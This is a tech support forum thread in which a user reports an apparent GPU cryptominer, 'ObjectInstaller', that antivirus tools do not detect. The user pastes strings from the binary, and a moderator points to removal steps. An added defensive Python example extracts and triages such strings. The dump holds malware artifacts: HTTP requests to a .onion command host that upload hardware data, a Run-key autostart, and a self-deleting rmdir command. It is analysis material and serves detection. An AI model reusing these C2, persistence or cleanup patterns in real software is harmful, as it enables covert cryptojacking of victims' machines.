Tech Support Forum > Security Center > Virus/Trojan/Spyware Help
I found a new virus not detected by any anti virus. Objectinstaller

07-11-2018, 05:07 PM   #1
Registered Member
 
Join Date: Aug 2004
Posts: 4
OS: xp



Nothing detects this yet.

Not malwarebytes

Not ADW

Not Win defender

No antivirus programs

The process creates a C:\Program Files\ObjectInstallerService folder containing a data file and objectinstaller.exe.

This is a delayed service in Windows services.

The .exe file is a self extracting executable.

It creates a Tor folder in program files.

Examining the contents of the zip without executing it lists a number of files, one of which contains the following strings.

The executable strings include:
A p p D a t a G P U R i s e g p u r i s e . z i p !G P U R i s e A g e n t . e x e s e r v i c e 2 o t h e r p a y l o a d 2 . z i p s t a r t _ m i n 1\ O b j e c t I n s t a l l e r S e r v i c e \ W/ C c h o i c e / C Y / N / D Y / T 8 & r m d i r / Q / S " " c m d . e x e [S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n 1 2 7 . 0 . 0 . 1 -m j o 7 m w 3 q 4 m t g s i k z . o n i o n G E T / ۇ H T T P / 1 . 1

H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n

C o n n e c t i o n : k e e p - a l i v e

A c c e p t : t e x t / h t m l

U s e r - A g e n t : g p u b o o s t 0 . 1
7\

C o n t e n t - L e n g t h : ( . * ? ) \

X 2 d e s k t o p
l a p t o p ;s e l e c t * f r o m W i n 3 2 _ P r o c e s s o r Gs e l e c t * f r o m W i n 3 2 _ V i d e o C o n t r o l l e r r o o t \ C I M V 2 iS E L E C T T o t a l P h y s i c a l M e m o r y F R O M W i n 3 2 _ C o m p u t e r S y s t e m 'T o t a l P h y s i c a l M e m o r y n a m e A d a p t e r R A M
n v i d i a a m d N u m b e r O f C o r e s SS E L E C T C a p t i o n F R O M W i n 3 2 _ O p e r a t i n g S y s t e m / u p l o a d / i n s t a l l !P O S T / u p l o a d H T T P / 1 . 1

H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n

C o n n e c t i o n : k e e p - a l i v e

A c c e p t : t e x t / h t m l

C o n t e n t - t y p e : a p p l i c a t i o n / j s o n

C o n t e n t - L e n g t h : 7

U s e r - A g e n t : m i n e r 0 . 1



g e f o r c e
r a d e o n QB a d r e s p o n s e r e c e i v e d f r o m p r o x y s e r v e r . 1A u t h e n t i c a t i o n r e q u i r e d . CO p e r a t i o n c o m p l e t e d s u c c e s s f u l l y . ;G e n e r a l S O C K S s e r v e r f a i l u r e . EC o n n e c t i o n n o t a l l o w e d b y r u l e s e t . )N e t w o r k u n r e a c h a b l e . #H o s t u n r e a c h a b l e . 'C o n n e c t i o n r e f u s e d . T T L e x p i r e d . -C o m m a n d n o t s u p p o r t e d . 7A d d r e s s t y p e n o t s u p p o r t e d . U n k n o w n e r r o r . t o r t o r . e x e t o r . z i p MT o r h a s s u c c e s s f u l l y o p e n e d a c i r c u i t . \ T o r \ X = Y = E n t e r X O f f s e t X O f f s e t 1 'W r o n g P a r a m e t e r s . . . E n t e r Y O f f s e t Y O f f s e t %p i c t u r e L e v e l . I m a g e p i c t u r e L e v e l
p R i g h t p L e f t p S e l e c t e d l i s t m e n u m e n u S t r i p 1 +f i l e T o o l S t r i p M e n u I t e m F i l e m O p e n O p e n . . . m S a v e S a v e m S a v e A s S a v e a s . . . %t o o l S t r i p M e n u I t e m 1 m E x i t E x i t 1a c t i o n d T o o l S t r i p M e n u I t e m A c t i o n s Ao f f s e t X S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t X S e l e c t e d Ao f f s e t Y S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t Y S e l e c t e d -a b o u t T o o l S t r i p M e n u I t e m A b o u t P T o p P R e s t )M a r i o L e v e l s | * . x m l p B u t t o m
s t a t u s s t a t u s S t r i p 1
l a b e l x
l a b e l y
T a h o m a o b j e c t n a m e l a b e l $ t h i s . I c o n M a i n F o r m L e v e l E d i t o r . d l l c I n t c B o o l T r u e F a l s e
: X = , Y = . A r i a l l N a m e
l a b e l 1 c I n t 1 c I n t 2 c I n t 3
c B o o l 1
c B o o l 2
c B o o l 3
b C l o s e C l o s e b S a v e F o r m P a r a m s #O b j e c t P r o p e r t i e s / d a t a / u / I n s t a l l S e r v i c e -O b j e c t I n s t a l l e r S e r v i c e KM a r i o L e v e l E d i t o r . P r o p e r t i e s . R e s o u r c e s S e l e c t e d C a p t i o n
.onion is undeniably the Tor network. I believe it's a GPU miner. It mines bitcoin remotely by taking over your GPU.
I don't know how I got this or who to inform about this file.

I saved a .zip copy if anyone wants it.
Gold333 is offline  
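The spaced-out text in the dump above is what UTF-16LE ("wide") strings look like when a Windows binary is viewed as single-byte text: every ASCII character is followed by a 0x00 byte, which renders as a space, so narrow-string tools (including `strings` without `-e l`) skip them entirely. The following Python is an added example, not code from the post or from the file it describes. It recovers wide strings from a byte blob by matching character/NUL pairs and then flags the categories a defender would triage first in a dump like this one: .onion hosts, WMI hardware-inventory queries (the Win32_Processor / Win32_VideoController / TotalPhysicalMemory queries above are typical of a miner sizing up a machine), the CurrentVersion\Run autostart key, and shell clean-up commands. SAMPLE_BLOB is constructed for this example; its text values are copied from the dump above, the byte layout around them is made up, and the regexes are heuristics written for this example, not a published signature.

```python
import re
from typing import Dict, List

# Constructed sample blob (not from the file in the post): UTF-16LE string literals
# laid out roughly the way a Windows PE or .NET assembly stores them, separated by
# NUL bytes and other non-text bytes. Text values are copied from the post's dump.
SAMPLE_BLOB = (
    b"\x90\x90\x00\x00"
    + "Host: mjo7mw3q4mtgsikz.onion".encode("utf-16-le") + b"\x00\x00"
    + b"\x13\x00"  # non-printable length-prefix style bytes between strings
    + "User-Agent: gpuboost0.1".encode("utf-16-le") + b"\x00\x00"
    + "select * from Win32_VideoController".encode("utf-16-le") + b"\x00\x00"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le") + b"\x00\x00"
    + b"ABC"  # a narrow (single-byte) run: not a wide string, must not be reported
    + "choice /C Y /N /D Y /T 8 & rmdir /Q /S".encode("utf-16-le")
)

MIN_LEN = 6  # minimum characters for a run to count as a string


def extract_wide_strings(blob: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Return every run of >= min_len printable-ASCII UTF-16LE characters in blob.

    A printable wide character is one byte in 0x20..0x7E followed by 0x00; the 0x00
    is what shows up as the 'A p p D a t a' spacing when the table is dumped as text.
    """
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(blob)]


# Triage heuristics (written for this example). v2 onion names are 16 base32 chars,
# v3 names are 56; the dump above shows a v2-style name.
ONION_HOST_RE = re.compile(r"\b(?:[a-z2-7]{56}|[a-z2-7]{16})\.onion\b")
WMI_QUERY_RE = re.compile(r"\bselect\b.+\bfrom\s+Win32_\w+", re.IGNORECASE)
AUTORUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
SHELL_CMD_RE = re.compile(r"\b(?:cmd\.exe|rmdir|choice)\b", re.IGNORECASE)


def triage(strings: List[str]) -> Dict[str, List[str]]:
    """Bucket recovered strings into the indicators worth looking at first."""
    findings: Dict[str, List[str]] = {
        "onion_hosts": [],
        "wmi_queries": [],
        "autorun_keys": [],
        "shell_commands": [],
    }
    for s in strings:
        findings["onion_hosts"].extend(ONION_HOST_RE.findall(s))
        if WMI_QUERY_RE.search(s):
            findings["wmi_queries"].append(s)
        if AUTORUN_KEY_RE.search(s):
            findings["autorun_keys"].append(s)
        if SHELL_CMD_RE.search(s):
            findings["shell_commands"].append(s)
    return findings


if __name__ == "__main__":
    # On a real sample you would read the bytes from disk instead of SAMPLE_BLOB.
    recovered = extract_wide_strings(SAMPLE_BLOB)
    for line in recovered:
        print(line)
    for bucket, hits in triage(recovered).items():
        print(f"{bucket}: {hits}")
```

The extractor deliberately requires the character/NUL pairing rather than stripping every other byte, so a narrow ASCII run (the `ABC` bytes in the sample) is not reported and a stray non-text byte simply ends a string instead of shifting the alignment of everything after it. The triage buckets are a starting point for a hunt, not a verdict: the same WMI classes are queried by legitimate inventory tools, so the combination (Tor host plus hardware inventory plus an autorun key plus a self-cleanup command in one binary) is what makes the dump above suspicious, not any single string.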
07-11-2018, 09:52 PM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

We want all our members to perform the steps outlined here:

https://www.techsupportforum.com/secu...oval-help.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new thread, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help Forum is extremely busy, and it may take a while to receive a reply.

__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015